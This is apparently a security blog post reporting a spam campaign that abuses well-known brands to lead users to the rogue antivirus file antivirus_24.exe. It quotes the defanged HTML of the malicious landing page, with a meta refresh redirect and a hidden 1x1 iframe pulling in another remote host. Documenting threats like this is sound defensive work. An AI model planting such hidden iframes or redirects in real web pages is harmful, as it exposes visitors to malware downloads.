Campaign with emails that lead to rogue AV software antivirus_24.exe continues

MX Lab reported yesterday on emails in which famous brands are used to lead users to a web site that hosts a malicious file, antivirus_24.exe.

Today, MX Lab intercepted even more of those emails, leading to the web page hxxp://clinique-fuer-schoene-haut.de/x.html. This page contains the following malicious code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>

<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>

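After 4 seconds you will be redirected to hxxp://hoopdotami.cz.cc/scanner5/?afid=24. While the page is open, the hidden 1x1 iframe also loads hxxp://baymediagroup.com:8080/index.php?pid=10 in the background.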

The brands we intercepted are Ikea, Macys, Snapfish, Zappos, SurveySpot, XM, Focus Point Global and Very Best Baking. Here are some screenshots of the emails.

More information regarding the threat can be found in the blog post "Malicious emails lead to rogue AV software antivirus_24.exe".
